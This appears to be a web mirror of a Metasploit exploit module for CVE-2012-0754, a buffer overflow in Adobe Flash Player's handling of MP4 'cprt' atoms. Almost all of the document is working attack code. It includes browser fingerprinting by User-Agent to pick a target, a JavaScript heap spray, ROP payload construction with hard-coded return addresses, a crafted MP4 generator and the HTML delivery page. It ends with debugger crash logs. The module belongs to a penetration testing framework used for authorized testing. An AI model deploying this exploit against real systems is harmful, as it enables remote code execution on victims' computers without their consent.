Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::RopDb

11
  include Msf::Exploit::Remote::BrowserAutopwn

12
  autopwn_info({

13
    :os_name => OperatingSystems::Match::WINDOWS,

14
    :method => "GetVariable",

15
    :classid => "ShockwaveFlash.ShockwaveFlash",

16
    :rank => NormalRanking, # reliable memory corruption

17
    :javascript => true

18
  })

19


20
  def initialize(info = {})

21
    super(

22
      update_info(

23
        info,

24
        'Name' => "Adobe Flash Player MP4 'cprt' Overflow",

25
        'Description' => %q{

26
          This module exploits a vulnerability found in Adobe Flash

27
          Player.  By supplying a corrupt .mp4 file loaded by Flash, it

28
          is possible to gain arbitrary remote code execution under the

29
          context of the user.

30


31
          This vulnerability has been exploited in the wild as part of

32
          the "Iran's Oil and Nuclear Situation.doc" e-mail attack.

33
          According to the advisory, 10.3.183.15 and 11.x before

34
          11.1.102.62 are affected.

35
        },

36
        'License' => MSF_LICENSE,

37
        'Author' => [

38
          'Alexander Gavrun', # Vulnerability discovery

39
          'sinn3r',           # Metasploit module

40
          'juan vazquez'      # Metasploit module

41
        ],

42
        'References' => [

43
          [ 'CVE', '2012-0754' ],

44
          [ 'OSVDB', '79300'],

45
          [ 'BID', '52034' ],

46
          [ 'URL', 'http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html' ],

47
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-03.html' ]

48
        ],

49
        'Payload' => {

50
          'Space' => 1000,

51
          'BadChars' => "\x00",

52
          'DisableNops' => true

53
        },

54
        'DefaultOptions' => {

55
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

56
        },

57
        'Platform' => 'win',

58
        'Targets' => [

59
          # Flash Player 11.1.102.55

60
          # Flash Player 10.3.183.10

61
          [ 'Automatic', {} ],

62
          [

63
            'IE 6 on Windows XP SP3',

64
            {

65
              'Rop' => nil,

66
              'Offset' => '0x800 - code.length',

67
              'Ret' => 0x0c0c0c0c

68
            }

69
          ],

70
          [

71
            'IE 7 on Windows XP SP3',

72
            {

73
              'Rop' => nil,

74
              'Offset' => '0x800 - code.length',

75
              'Ret' => 0x0c0c0c0c

76
            }

77
          ],

78
          [

79
            'IE 8 on Windows XP SP3 with msvcrt ROP',

80
            {

81
              'Rop' => :msvcrt,

82
              'Offset' => '0x5f4',

83
              'Ret' => 0x77c15ed5,

84
              'ppr' => 0x77C1CAFB

85
            }

86
          ],

87
          [

88
            'IE 8 on Windows XP SP3 with JRE ROP',

89
            {

90
              'Rop' => :jre,

91
              'Offset' => '0x5f4',

92
              'Ret' => 0x77c15ed5,

93
              'ppr' => 0x77C1CAFB

94
            }

95
          ],

96
          [

97
            'IE 7 on Windows Vista',

98
            {

99
              'Rop' => nil,

100
              'Offset' => '0x5f4',

101
              'Ret' => 0x0c0c0c0c

102
            }

103
          ],

104
          [

105
            'IE 8 on Windows 7 SP1',

106
            {

107
              'Rop' => :jre,

108
              'Offset' => '0x5f4',

109
              'Ret' => 0x7c348b05,

110
              'ppr' => 0x7c34272e

111
            }

112
          ]

113
        ],

114
        'Privileged' => false,

115
        'DisclosureDate' => '2012-02-15',

116
        'DefaultTarget' => 0,

117
        'Notes' => {

118
          'Reliability' => UNKNOWN_RELIABILITY,

119
          'Stability' => UNKNOWN_STABILITY,

120
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

121
        }

122
      )

123
    )

124
  end

125


126
  def junk(n = 4)

127
    return rand_text_alpha(n).unpack("V").first

128
  end

129


130
  def get_payload(t, cli)

131
    if t['Rop'].nil?

132
      code = ""

133
    else

134
      # Fix the stack to avoid anything busted

135
      code = "\x81\xC4\x54\xF2\xFF\xFF"

136
    end

137
    code << payload.encoded

138


139
    # No rop. Just return the payload.

140
    return code if t['Rop'].nil?

141


142
    rop_name = (t['Rop'] and t['Rop'] == :msvcrt) ? 'msvcrt' : 'java'

143
    rop_target = (rop_name == 'msvcrt') ? 'xp' : ''

144


145
    pivot = [t['ppr']].pack('V*') # POP/POP/RET

146
    pivot << [junk].pack('V*')

147
    pivot << [t.ret].pack('V*')

148


149
    code = generate_rop_payload(rop_name, code, { 'target' => rop_target })

150
    return code

151
  end

152


153
  def get_target(agent)

154
    # If the user is already specified by the user, we'll just use that

155
    return target if target.name != 'Automatic'

156


157
    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/

158
      return targets[1]  # IE 6 on Windows XP SP3

159
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/

160
      return targets[2]  # IE 7 on Windows XP SP3

161
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/

162
      return targets[3]  # IE 8 on Windows XP SP3

163
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/

164
      return targets[5]  # IE 7 on Windows Vista

165
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/

166
      return targets[6]  # IE 8 on Windows Vista SP1 with JRE

167
    else

168
      return nil

169
    end

170
  end

171


172
  def primer

173
    # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource

174
    hardcoded_uripath("/test.mp4")

175
  end

176


177
  def exploit

178
    @swf = create_swf

179
    super

180
  end

181


182
  def on_request_uri(cli, request)

183
    agent = request.headers['User-Agent']

184
    my_target = get_target(agent)

185


186
    # Avoid the attack if the victim doesn't have the same setup we're targeting

187
    if my_target.nil?

188
      print_error("Browser not supported: #{agent}")

189
      send_not_found(cli)

190
      return

191
    end

192


193
    print_status("Client requesting: #{request.uri}")

194


195
    # The SWF requests our MP4 trigger

196
    if request.uri =~ /\.mp4$/

197
      print_status("Sending MP4...")

198
      mp4 = create_mp4(my_target)

199
      send_response(cli, mp4, { 'Content-Type' => 'video/mp4' })

200
      return

201
    end

202


203
    if request.uri =~ /\.swf$/

204
      print_status("Sending Exploit SWF")

205
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })

206
      return

207
    end

208


209
    p = get_payload(my_target, cli)

210


211
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))

212
    js_nops = Rex::Text.to_unescape("\x0c" * 4, Rex::Arch.endian(my_target.arch))

213
    randnop = rand_text_alpha(rand(100) + 1)

214


215
    js_pivot = <<-JS

216
    var heap_obj = new heapLib.ie(0x20000);

217
    var code = unescape("#{js_code}");

218
    var #{randnop} = "#{js_nops}";

219
    var nops = unescape(#{randnop});

220


221
    while (nops.length < 0x80000) nops += nops;

222
    var offset = nops.substring(0, #{my_target['Offset']});

223
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

224


225
    while (shellcode.length < 0x40000) shellcode += shellcode;

226
    var block = shellcode.substring(0, (0x80000-6)/2);

227


228
    heap_obj.gc();

229
    heap_obj.debug(true);

230
    for (var i=1; i < 0x1C2; i++) {

231
      heap_obj.alloc(block);

232
    }

233
    heap_obj.debug(true);

234
    JS

235


236
    js_pivot = heaplib(js_pivot, { :noobfu => true })

237


238
    swf_uri = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource

239
    swf_uri << "/#{rand_text_alpha(rand(6) + 3)}.swf"

240


241
    html = %Q|

242
<html>

243
<head>

244
<script>

245
#{js_pivot}

246
</script>

247
</head>

248
<body>

249
<center>

250
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"

251
id="test" width="1" height="1"

252
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">

253
<param name="movie" value="#{swf_uri}" />

254
<embed src="#{swf_uri}" quality="high"

255
width="1" height="1" name="test" align="middle"

256
allowNetworking="all"

257
type="application/x-shockwave-flash"

258
pluginspage="http://www.macromedia.com/go/getflashplayer">

259
</embed>

260


261
</object>

262
</center>

263


264
</body>

265
</html>

266
    |

267


268
    html = html.gsub(/^ {4}/, '')

269


270
    print_status("Sending html")

271
    send_response(cli, html, { 'Content-Type' => 'text/html' })

272
  end

273


274
  def create_swf

275
    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2012-0754.swf")

276
    fd = ::File.open(path, "rb")

277
    swf = fd.read(fd.stat.size)

278
    fd.close

279


280
    return swf

281
  end

282


283
  def create_mp4(target)

284
    mp4 = ""

285
    mp4 << "\x00\x00\x00\x18"

286
    mp4 << "ftypmp42"

287
    mp4 << "\x00\x00\x00\x00"

288
    mp4 << "mp42isom"

289
    mp4 << "\x00\x00\x00\x0D"

290
    mp4 << "cprt"

291
    mp4 << "\x00\xFF\xFF\xFF"

292
    mp4 << "\x00\x00\x00\x00"

293
    mp4 << "\x0c\x0c\x0c\x0c" * 2586

294


295
    return mp4

296
  end

297
end

298


299
=begin

300
C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx

301


302
(4b4.1d0): Access violation - code c0000005 (first chance)

303
First chance exceptions are reported before any exception handling.

304
This exception may be expected and handled.

305
eax=0c0c0c0c ebx=00000000 ecx=0308b1a0 edx=00000004 esi=0308b1a0 edi=00000001

306
eip=027a2626 esp=0377fec0 ebp=0377ff0c iopl=0         nv up ei pl zr na pe nc

307
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

308
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx -

309
Flash11e+0x52626:

310
027a2626 ff5008          call    dword ptr [eax+8]    ds:0023:0c0c0c14=????????

311


312
C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx

313


314
(510.9b4): Access violation - code c0000005 (first chance)

315
First chance exceptions are reported before any exception handling.

316
This exception may be expected and handled.

317
eax=0c0c0c0c ebx=03e46810 ecx=0396b160 edx=00000004 esi=03e46cd4 edi=00000000

318
eip=10048b65 esp=0428fd10 ebp=0428feb4 iopl=0         nv up ei pl zr na pe nc

319
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

320
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx -

321
Flash10x+0x48b65:

322
10048b65 ff5008          call    dword ptr [eax+8]    ds:0023:0c0c0c14=????????

323
=end

324


325